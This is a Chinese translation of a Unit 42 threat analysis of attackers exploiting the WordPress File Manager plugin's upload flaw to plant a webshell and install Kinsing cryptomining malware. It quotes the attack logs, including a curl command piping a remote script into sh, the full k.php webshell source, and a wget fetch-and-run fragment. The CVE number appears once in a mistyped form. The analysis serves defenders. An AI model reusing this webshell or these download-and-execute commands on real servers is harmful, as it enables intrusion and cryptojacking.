[[381498]]

 2020年12月，Unit 42研究人員發現有攻擊者嘗試利用WordPress File Manager(文件管理器)插件中的文件上傳漏洞。攻擊者成功利用該漏洞可以以任意文件名和擴展上傳任意文件，引發目標web 服務器上的遠程代碼執行。

攻擊者利用該漏洞利用來安裝webshell，然后該webshell 被用來安裝Kinsing惡意軟件，該惡意軟件會從H2miner 家族運行惡意加密貨幣挖礦機。Kinsing是用Golang編程語言開發的，最終的目標是用于容器環境中的加密貨幣劫持攻擊。

CVE-2020-2513和Webshells

CVE-2020-2513漏洞產生的原因是WordPress文件管理器插件將elFinder庫的connector.minimal.php.dist 文件擴展名改成了.php，所以該文件可以直接執行。但是因為該文件沒有訪問限制，因此任何瀏覽該web 服務器的用戶都可以執行。該文件包含無需認證就上傳文件到web服務器的機制。由于該漏洞，任何人都可以上傳文件，因此惡意攻擊者就利用該機制來上傳webshell，可以用來進行下一步的惡意軟件安裝或加密貨幣挖礦活動。

攻擊鏈

研究人員調查發現被攻擊的機器中有以下日志信息，其中發給Web服務器的HTTP POST請求有：

[19/Dec/2020:08:58:08 +0000] “POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1” 200 1453 “-” “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36” 

該請求用來上傳webshell。研究人員進一步分析發現了惡意webshell：

[19/Dec/2020:08:57:48 +0000] “GET /wp-content/plugins/wp-file-manager/lib/files/k.php?cmd=curl+X.X.X.X%2Fwpf.sh%7Csh HTTP/1.1” 200 411 

從上圖中可以發現，該webshell名為k.php，并提供了一個執行的命令。該webshell 本身非常簡單，是在web 服務器上明文保存的，并且不含有任何的混淆和認證措施：

< ?php if(isset($_REQUEST['cmd']){ echo "< pre >"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "< /pre >"; die; }? > 

研究人員進一步分析返回給webshell k.php的HTTP GET請求，發現該命令調用了下載名為wpf.sh文件的curl 命令，并執行該文件。

研究人員從攻擊者的C2 服務器中獲得了該shell腳本，文件內容如下：

$WGET $DIR/kinsing http://X.X.X.X/kinsing 
chmod +x $DIR/kinsing 
… 
SKL=wpf $DIR/kinsing 
… 

 wpf.sh文件是一個使用wget下載Kinsing的腳本，給予該腳本執行權限，并執行。

總結

研究人員發現了WordPress 文件管理器遠程代碼執行漏洞 CVE-2020-25213 的在野利用。攻擊者利用該漏洞利用來安裝Kinsing惡意軟件，運行一個H2miner家族的惡意加密貨幣挖礦機。Kinsing的最終目標是用于容器環境的加密貨幣劫持攻擊。

本文翻譯自：https://unit42.paloaltonetworks.com/cve-2020-25213/如若轉載，請注明原文地址。